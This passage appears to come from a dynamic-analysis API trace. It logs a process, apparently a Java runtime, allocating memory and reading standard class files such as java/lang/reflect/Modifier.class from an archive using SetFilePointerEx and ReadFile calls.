malloc (_Size=0xa0) returned 0x1220d090 [0094.503] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c8de, lpNewFilePointer=0x208e090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e090*=54642910) returned 1 [0094.503] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e060, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e060*=0xa0, lpOverlapped=0x0) returned 1 [0094.503] malloc (_Size=0x5e) returned 0x1220d140 [0094.504] free (_Block=0x1220d090) [0094.504] strlen (_Str="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl.class") returned 0x5d [0094.504] strcpy (in: _Dest=0x208e210, _Source="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl.class" | out: _Dest="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl.class") returned="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl.class" [0094.504] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a5b95, lpNewFilePointer=0x208dc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc90*=52059029) returned 1 [0094.504] ReadFile (in: hFile=0x134, lpBuffer=0x208dce0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dc60, lpOverlapped=0x0 | out: lpBuffer=0x208dce0*, lpNumberOfBytesRead=0x208dc60*=0x1e, lpOverlapped=0x0) returned 1 [0094.517] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a5c10, lpNewFilePointer=0x208dcf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcf0*=52059152) returned 1 [0094.517] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x208dcc0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dcc0*=0x1498, lpOverlapped=0x0) returned 1 [0094.540] free (_Block=0x121d9800) [0094.540] free (_Block=0x121d99e0) [0094.548] malloc (_Size=0x48) returned 0x121d9080 [0094.548] malloc (_Size=0xa0) returned 0x1220d090 [0094.548] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c851, lpNewFilePointer=0x208dff0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dff0*=54642769) returned 1 [0094.549] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dfc0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208dfc0*=0xa0, lpOverlapped=0x0) returned 1 [0094.549] malloc (_Size=0x60) returned 0x1220f5d0 [0094.549] free (_Block=0x1220d090) [0094.550] strlen (_Str="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl$1.class") returned 0x5f [0094.550] strcpy (in: _Dest=0x208e170, _Source="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl$1.class" | out: _Dest="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl$1.class") returned="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl$1.class" [0094.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a55a5, lpNewFilePointer=0x208dbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbf0*=52057509) returned 1 [0094.550] ReadFile (in: hFile=0x134, lpBuffer=0x208dc40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dbc0, lpOverlapped=0x0 | out: lpBuffer=0x208dc40*, lpNumberOfBytesRead=0x208dbc0*=0x1e, lpOverlapped=0x0) returned 1 [0094.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a5622, lpNewFilePointer=0x208dc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc50*=52057634) returned 1 [0094.550] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x573, lpNumberOfBytesRead=0x208dc20, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dc20*=0x573, lpOverlapped=0x0) returned 1 [0094.551] free (_Block=0x1220d140) [0094.551] free (_Block=0x121d8fe0) [0094.552] strlen (_Str="java/security/PrivilegedExceptionAction.class") returned 0x2d [0094.553] malloc (_Size=0x48) returned 0x121d8fe0 [0094.553] malloc (_Size=0xa0) returned 0x1220d090 [0094.555] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c7f6, lpNewFilePointer=0x208d530, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d530*=54642678) returned 1 [0094.555] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d500, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208d500*=0xa0, lpOverlapped=0x0) returned 1 [0094.555] malloc (_Size=0x2e) returned 0x121d9f30 [0094.555] free (_Block=0x1220d090) [0094.555] strlen (_Str="java/security/PrivilegedExceptionAction.class") returned 0x2d [0094.556] strcpy (in: _Dest=0x208d6b0, _Source="java/security/PrivilegedExceptionAction.class" | out: _Dest="java/security/PrivilegedExceptionAction.class") returned="java/security/PrivilegedExceptionAction.class" [0094.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a545b, lpNewFilePointer=0x208d130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d130*=52057179) returned 1 [0094.556] ReadFile (in: hFile=0x134, lpBuffer=0x208d180, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d100, lpOverlapped=0x0 | out: lpBuffer=0x208d180*, lpNumberOfBytesRead=0x208d100*=0x1e, lpOverlapped=0x0) returned 1 [0094.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a54a6, lpNewFilePointer=0x208d190, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d190*=52057254) returned 1 [0094.556] ReadFile (in: hFile=0x134, lpBuffer=0x2103170, nNumberOfBytesToRead=0xff, lpNumberOfBytesRead=0x208d160, lpOverlapped=0x0 | out: lpBuffer=0x2103170*, lpNumberOfBytesRead=0x208d160*=0xff, lpOverlapped=0x0) returned 1 [0094.556] free (_Block=0x1220f5d0) [0094.557] free (_Block=0x121d9080) [0094.569] strlen (_Str="java/lang/Class$3.class") returned 0x17 [0094.569] malloc (_Size=0x48) returned 0x121d9a80 [0094.569] malloc (_Size=0xa0) returned 0x1220d090 [0094.569] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c7b1, lpNewFilePointer=0x208d260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d260*=54642609) returned 1 [0094.569] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d230, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208d230*=0xa0, lpOverlapped=0x0) returned 1 [0094.569] malloc (_Size=0x18) returned 0x1220cda0 [0094.570] free (_Block=0x1220d090) [0094.570] strlen (_Str="java/lang/Class$3.class") returned 0x17 [0094.570] strcpy (in: _Dest=0x208d3e0, _Source="java/lang/Class$3.class" | out: _Dest="java/lang/Class$3.class") returned="java/lang/Class$3.class" [0094.570] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a50e9, lpNewFilePointer=0x208ce60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce60*=52056297) returned 1 [0094.570] ReadFile (in: hFile=0x134, lpBuffer=0x208ceb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce30, lpOverlapped=0x0 | out: lpBuffer=0x208ceb0*, lpNumberOfBytesRead=0x208ce30*=0x1e, lpOverlapped=0x0) returned 1 [0094.570] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a511e, lpNewFilePointer=0x208cec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cec0*=52056350) returned 1 [0094.570] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x33d, lpNumberOfBytesRead=0x208ce90, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ce90*=0x33d, lpOverlapped=0x0) returned 1 [0094.571] free (_Block=0x121d9f30) [0094.571] free (_Block=0x121d8fe0) [0094.579] strlen (_Str="java/lang/Class$ReflectionData.class") returned 0x24 [0094.579] malloc (_Size=0x48) returned 0x121d9d50 [0094.579] malloc (_Size=0xa0) returned 0x1220d090 [0094.579] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c75f, lpNewFilePointer=0x208d1d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1d0*=54642527) returned 1 [0094.579] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d1a0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208d1a0*=0xa0, lpOverlapped=0x0) returned 1 [0094.579] malloc (_Size=0x25) returned 0x121d7e20 [0094.579] free (_Block=0x1220d090) [0094.579] strlen (_Str="java/lang/Class$ReflectionData.class") returned 0x24 [0094.580] strcpy (in: _Dest=0x208d350, _Source="java/lang/Class$ReflectionData.class" | out: _Dest="java/lang/Class$ReflectionData.class") returned="java/lang/Class$ReflectionData.class" [0094.580] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a4da2, lpNewFilePointer=0x208cdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdd0*=52055458) returned 1 [0094.580] ReadFile (in: hFile=0x134, lpBuffer=0x208ce20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cda0, lpOverlapped=0x0 | out: lpBuffer=0x208ce20*, lpNumberOfBytesRead=0x208cda0*=0x1e, lpOverlapped=0x0) returned 1 [0094.614] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a4de4, lpNewFilePointer=0x208ce30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce30*=52055524) returned 1 [0094.614] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x305, lpNumberOfBytesRead=0x208ce00, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ce00*=0x305, lpOverlapped=0x0) returned 1 [0094.615] free (_Block=0x1220cda0) [0094.615] free (_Block=0x121d9a80) [0094.622] strlen (_Str="java/lang/Class$Atomic.class") returned 0x1c [0094.622] malloc (_Size=0x48) returned 0x121d9670 [0094.622] malloc (_Size=0xa0) returned 0x1220d090 [0094.622] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c715, lpNewFilePointer=0x208cf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf10*=54642453) returned 1 [0094.622] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cee0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208cee0*=0xa0, lpOverlapped=0x0) returned 1 [0094.623] malloc (_Size=0x1d) returned 0x121d8180 [0094.623] free (_Block=0x1220d090) [0094.623] strlen (_Str="java/lang/Class$Atomic.class") returned 0x1c [0094.623] strcpy (in: _Dest=0x208d090, _Source="java/lang/Class$Atomic.class" | out: _Dest="java/lang/Class$Atomic.class") returned="java/lang/Class$Atomic.class" [0094.623] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a442a, lpNewFilePointer=0x208cb10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb10*=52053034) returned 1 [0094.623] ReadFile (in: hFile=0x134, lpBuffer=0x208cb60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cae0, lpOverlapped=0x0 | out: lpBuffer=0x208cb60*, lpNumberOfBytesRead=0x208cae0*=0x1e, lpOverlapped=0x0) returned 1 [0094.623] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a4464, lpNewFilePointer=0x208cb70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb70*=52053092) returned 1 [0094.623] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x93e, lpNumberOfBytesRead=0x208cb40, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cb40*=0x93e, lpOverlapped=0x0) returned 1 [0094.624] free (_Block=0x121d7e20) [0094.624] free (_Block=0x121d9d50) [0094.640] malloc (_Size=0x48) returned 0x121d9710 [0094.640] malloc (_Size=0xa0) returned 0x1220d090 [0094.640] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c6b2, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=54642354) returned 1 [0094.640] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208cd30*=0xa0, lpOverlapped=0x0) returned 1 [0094.640] malloc (_Size=0x36) returned 0x121daab0 [0094.641] free (_Block=0x1220d090) [0094.641] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a3b81, lpNewFilePointer=0x208c960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c960*=52050817) returned 1 [0094.641] ReadFile (in: hFile=0x134, lpBuffer=0x208c9b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c930, lpOverlapped=0x0 | out: lpBuffer=0x208c9b0*, lpNumberOfBytesRead=0x208c930*=0x1e, lpOverlapped=0x0) returned 1 [0094.729] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a3bd4, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=52050900) returned 1 [0094.729] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x856, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208c990*=0x856, lpOverlapped=0x0) returned 1 [0094.730] malloc (_Size=0x48) returned 0x121d9a30 [0094.730] malloc (_Size=0xa0) returned 0x1220d090 [0094.731] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c649, lpNewFilePointer=0x208c320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c320*=54642249) returned 1 [0094.731] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2f0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208c2f0*=0xa0, lpOverlapped=0x0) returned 1 [0094.731] malloc (_Size=0x3c) returned 0x121d9ad0 [0094.731] free (_Block=0x1220d090) [0094.731] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a35d9, lpNewFilePointer=0x208bf20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf20*=52049369) returned 1 [0094.731] ReadFile (in: hFile=0x134, lpBuffer=0x208bf70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bef0, lpOverlapped=0x0 | out: lpBuffer=0x208bf70*, lpNumberOfBytesRead=0x208bef0*=0x1e, lpOverlapped=0x0) returned 1 [0094.731] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a3632, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=52049458) returned 1 [0094.731] ReadFile (in: hFile=0x134, lpBuffer=0x121b5540, nNumberOfBytesToRead=0x54f, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x121b5540*, lpNumberOfBytesRead=0x208bf50*=0x54f, lpOverlapped=0x0) returned 1 [0094.732] malloc (_Size=0x48) returned 0x121d9a80 [0094.732] malloc (_Size=0xa0) returned 0x1220d090 [0094.732] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c5e3, lpNewFilePointer=0x208b8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8e0*=54642147) returned 1 [0094.732] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b8b0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208b8b0*=0xa0, lpOverlapped=0x0) returned 1 [0094.732] malloc (_Size=0x39) returned 0x121d9c60 [0094.732] free (_Block=0x1220d090) [0094.732] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a317d, lpNewFilePointer=0x208b4e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4e0*=52048253) returned 1 [0094.732] ReadFile (in: hFile=0x134, lpBuffer=0x208b530, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b4b0, lpOverlapped=0x0 | out: lpBuffer=0x208b530*, lpNumberOfBytesRead=0x208b4b0*=0x1e, lpOverlapped=0x0) returned 1 [0094.733] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a31d3, lpNewFilePointer=0x208b540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b540*=52048339) returned 1 [0094.733] ReadFile (in: hFile=0x134, lpBuffer=0x121b5c80, nNumberOfBytesToRead=0x406, lpNumberOfBytesRead=0x208b510, lpOverlapped=0x0 | out: lpBuffer=0x121b5c80*, lpNumberOfBytesRead=0x208b510*=0x406, lpOverlapped=0x0) returned 1 [0094.733] malloc (_Size=0x48) returned 0x121d92b0 [0094.733] malloc (_Size=0xa0) returned 0x1220d090 [0094.734] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c591, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=54642065) returned 1 [0094.734] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208cd30*=0xa0, lpOverlapped=0x0) returned 1 [0094.734] malloc (_Size=0x25) returned 0x121d7af0 [0094.734] free (_Block=0x1220d090) [0094.734] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a2e4d, lpNewFilePointer=0x208c960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c960*=52047437) returned 1 [0094.734] ReadFile (in: hFile=0x134, lpBuffer=0x208c9b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c930, lpOverlapped=0x0 | out: lpBuffer=0x208c9b0*, lpNumberOfBytesRead=0x208c930*=0x1e, lpOverlapped=0x0) returned 1 [0094.872] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a2e8f, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=52047503) returned 1 [0094.872] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2ee, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208c990*=0x2ee, lpOverlapped=0x0) returned 1 [0094.873] malloc (_Size=0x48) returned 0x121d99e0 [0094.873] malloc (_Size=0xa0) returned 0x1220d090 [0094.873] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c538, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=54641976) returned 1 [0094.873] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208cd30*=0xa0, lpOverlapped=0x0) returned 1 [0094.873] malloc (_Size=0x2c) returned 0x121da370 [0094.874] free (_Block=0x1220d090) [0094.874] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a1b20, lpNewFilePointer=0x208c960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c960*=52042528) returned 1 [0094.874] ReadFile (in: hFile=0x134, lpBuffer=0x208c9b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c930, lpOverlapped=0x0 | out: lpBuffer=0x208c9b0*, lpNumberOfBytesRead=0x208c930*=0x1e, lpOverlapped=0x0) returned 1 [0095.079] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a1b69, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=52042601) returned 1 [0095.079] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x12e4, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208c990*=0x12e4, lpOverlapped=0x0) returned 1 [0095.080] malloc (_Size=0x48) returned 0x121d9210 [0095.080] malloc (_Size=0xa0) returned 0x1220d090 [0095.080] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c4e2, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=54641890) returned 1 [0095.081] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208cd30*=0xa0, lpOverlapped=0x0) returned 1 [0095.081] malloc (_Size=0x29) returned 0x121daab0 [0095.081] free (_Block=0x1220d090) [0095.081] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a01ce, lpNewFilePointer=0x208c960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c960*=52036046) returned 1 [0095.081] ReadFile (in: hFile=0x134, lpBuffer=0x208c9b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c930, lpOverlapped=0x0 | out: lpBuffer=0x208c9b0*, lpNumberOfBytesRead=0x208c930*=0x1e, lpOverlapped=0x0) returned 1 [0095.133] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a0214, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=52036116) returned 1 [0095.134] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x190c, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208c990*=0x190c, lpOverlapped=0x0) returned 1 [0095.134] malloc (_Size=0x48) returned 0x121d8fe0 [0095.134] malloc (_Size=0xa0) returned 0x1220d090 [0095.134] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c499, lpNewFilePointer=0x208c320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c320*=54641817) returned 1 [0095.135] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2f0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208c2f0*=0xa0, lpOverlapped=0x0) returned 1 [0095.135] malloc (_Size=0x1c) returned 0x121d8180 [0095.135] free (_Block=0x1220d090) [0095.135] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319e147, lpNewFilePointer=0x208bf20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf20*=52027719) returned 1 [0095.135] ReadFile (in: hFile=0x134, lpBuffer=0x208bf70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bef0, lpOverlapped=0x0 | out: lpBuffer=0x208bf70*, lpNumberOfBytesRead=0x208bef0*=0x1e, lpOverlapped=0x0) returned 1 [0095.140] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319e180, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=52027776) returned 1 [0095.140] ReadFile (in: hFile=0x134, lpBuffer=0x121b6590, nNumberOfBytesToRead=0x204e, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x121b6590*, lpNumberOfBytesRead=0x208bf50*=0x204e, lpOverlapped=0x0) returned 1 [0095.147] strlen (_Str="java/lang/reflect/Modifier.class") returned 0x20 [0095.147] malloc (_Size=0x48) returned 0x121d9580 [0095.147] malloc (_Size=0xa0) returned 0x1220d1d0 [0095.147] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c44b, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=54641739) returned 1 [0095.147] ReadFile (in: hFile=0x134, lpBuffer=0x1220d1d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x1220d1d0*, lpNumberOfBytesRead=0x208c3b0*=0xa0, lpOverlapped=0x0) returned 1 [0095.147] malloc (_Size=0x21) returned 0x121d7d30 [0095.147] free (_Block=0x1220d1d0) [0095.147] strlen (_Str="java/lang/reflect/Modifier.class") returned 0x20 [0095.148] strcpy (in: _Dest=0x208c560, _Source="java/lang/reflect/Modifier.class" | out: _Dest="java/lang/reflect/Modifier.class") returned="java/lang/reflect/Modifier.class" [0095.148] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319d3f1, lpNewFilePointer=0x208bfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfe0*=52024305) returned 1 [0095.148] ReadFile (in: hFile=0x134, lpBuffer=0x208c030, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bfb0, lpOverlapped=0x0 | out: lpBuffer=0x208c030*, lpNumberOfBytesRead=0x208bfb0*=0x1e, lpOverlapped=0x0) returned 1 [0095.149] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319d42f, lpNewFilePointer=0x208c040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c040*=52024367) returned 1 [0095.149] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xd18, lpNumberOfBytesRead=0x208c010, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c010*=0xd18, lpOverlapped=0x0) returned 1 [0095.149] free (_Block=0x121d8180) [0095.149] free (_Block=0x121d8fe0) [0095.160] strlen (_Str="java/lang/reflect/ReflectAccess.class") returned 0x25 [0095.161] malloc (_Size=0x48) returned 0x121d9c60 [0095.161] malloc (_Size=0xa0) returned 0x12217ae0 [0095.161] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c3f8, lpNewFilePointer=0x208bd50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd50*=54641656) returned 1 [0095.161] ReadFile (in: hFile=0x134, lpBuffer=0x12217ae0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd20, lpOverlapped=0x0 | out: lpBuffer=0x12217ae0*, lpNumberOfBytesRead=0x208bd20*=0xa0, lpOverlapped=0x0) returned 1 [0095.161] malloc (_Size=0x26) returned 0x121d8180 [0095.161] free (_Block=0x12217ae0) [0095.161] strlen (_Str="java/lang/reflect/ReflectAccess.class") returned 0x25 [0095.161] strcpy (in: _Dest=0x208bed0, _Source="java/lang/reflect/ReflectAccess.class" | out: _Dest="java/lang/reflect/ReflectAccess.class") returned="java/lang/reflect/ReflectAccess.class" [0095.162] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319c4bf, lpNewFilePointer=0x208b950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b950*=52020415) returned 1 [0095.162] ReadFile (in: hFile=0x134, lpBuffer=0x208b9a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b920, lpOverlapped=0x0 | out: lpBuffer=0x208b9a0*, lpNumberOfBytesRead=0x208b920*=0x1e, lpOverlapped=0x0) returned 1 [0095.170] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x319c502, lpNewFilePointer=0x208b9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9b0*=52020482) returned 1 [0095.170] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xeef, lpNumberOfBytesRead=0x208b980, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208b980*=0xeef, lpOverlapped=0x0) returned 1 [0095.170] free (_Block=0x121d7d30) [0095.171] free (_Block=0x121d9580) [0095.172] strlen (_Str="sun/reflect/LangReflectAccess.class") returned 0x23 [0095.172] malloc (_Size=0x48) returned 0x121d9cb0 [0095.172] malloc (_Size=0xa0) returned 0x12217ae0 [0095.172] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c3a7, lpNewFilePointer=0x208b290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b290*=54641575) returned 1 [0095.173] ReadFile (in: hFile=0x134, lpBuffer=0x12217ae0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b260, lpOverlapped=0x0 | out: lpBuffer=0x12217ae0*, lpNumberOfBytesRead=0x208b260*=0xa0, lpOverlapped=0x0) returned 1 [0095.173] malloc (_Size=0x24) returned 0x121d7a30 [0095.173] free 